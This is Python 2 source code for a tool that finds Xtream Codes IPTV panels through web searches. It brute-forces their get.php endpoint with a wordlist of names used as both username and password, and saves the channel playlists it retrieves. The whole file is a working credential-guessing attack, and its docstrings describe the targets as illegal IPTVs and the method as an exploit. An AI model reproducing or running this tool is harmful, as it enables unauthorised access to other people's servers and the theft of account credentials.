python source code of Crawler

import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse

"""Crawler
Class that handles the crawling process that fetch accounts on illegal IPTVs

Authors:
Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
"""
class Crawler(object):
    # version
    version = "1.2.3"
    # output default directory
    outputDir = "output"
    # language default directory
    languageDir = "languages"
    # string used to exploit the CMS
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
    # string used to search the CMS
    searchString = "Xtream Codes v1.0.59.5"

    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)
        """
        self.language = language.lower()
        self.parsedUrls = []
        self.foundedAccounts = 0

    def change_language(self, language = "it"):
        """Set the language you want to use to brute force names

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)

        Return:
        boolean -- true if the language file exists, otherwise false
        """
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
        else:
            return False

    def search_links(self):
        """Print the first 30 links from a Web search

        We set the limit of 30 links because this script serve as demonstration and it's
        not intended to be use for personal purpose.
        """
        for url in google.search(self.searchString, num=30, stop=1):
            parsed = urlparse(url)
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)

    def search_accounts(self, url = None):
        """Search Accounts
        This is the core method. It will crawl the give url for any possible accounts
        If we found any we will create a new directory under /output with the name
        of the site plus every account as five .m3u. Please use VLC for opening that
        kind of files

        Keyword arguments:
        url -- an url from the fetched list. (default None)

        Return:
        string -- the status of the crawling session
        """
        if not self.parsedUrls:
            return "You must fetch some URLs first"
        try:
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
            foundedAccounts = 0
            with open(fileName) as f:
                rows = f.readlines()
            for row in rows:
                # Do the injection to the current url using the exploit that we know
                opener = urllib2.build_opener()
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                response = opener.open(url + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
                fetched = response.read()
                # Update the progress bar in order to give to the user a nice
                # way to indicate the time left
                fileLength = fileLength - 1
                progressBar.update()
                # IF the fetched content is not empty
                # we build the dedicated .m3u file
                if len(fetched) > 0:
                    newPath = self.outputDir + "/" + url.replace("http://", "")
                    self.create_file(row, newPath, fetched)
            # Remove the current used url in order to avoid to parse it again
            self.parsedUrls.remove(url)
            if self.foundedAccounts != 0:
                return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
            else:
                return "No results for " + url
        except IOError:
            return "Cannot open the current Language file. Try another one"
        except urllib2.HTTPError, e:
            return "Ops, HTTPError exception here. Cannot fetch the current URL " + str(e.code)
        except urllib2.URLError, e:
            return "Ops, the URL seems broken." + str(e.reason)
        except Exception:
            return "Ops something went wrong!"

    def create_file(self, row, newPath, fetched):
        """Create File
        Once the parse founds something worth it, we need to create the .m3u file
        to do so we except a newPath and the current row used from names file and also
        the content from the fetched response

        Keyword arguments:
        row -- row of the language file, this allow us to understand which names
        were useful for the brute force.

        newPath -- The path that we use to store the current fetched accounts.

        fetched -- the current response file from the attack.
        """
        if os.path.exists(newPath) is False:
            os.makedirs(newPath)
        outputFile = open(str(newPath) + "/tv_channels_%s.m3u" % row.rstrip().lstrip(), "w")
        outputFile.write(fetched)
        self.foundedAccounts = self.foundedAccounts + 1
        outputFile.close()

    def file_length(self, fileName):
        """File Length
        Cheapest way to calculate the rows of a file

        Keyword arguments:
        fileName -- string the filename into which we will check its Length
        """
        with open(fileName) as f:
            for i, l in enumerate(f):
                pass
        return i + 1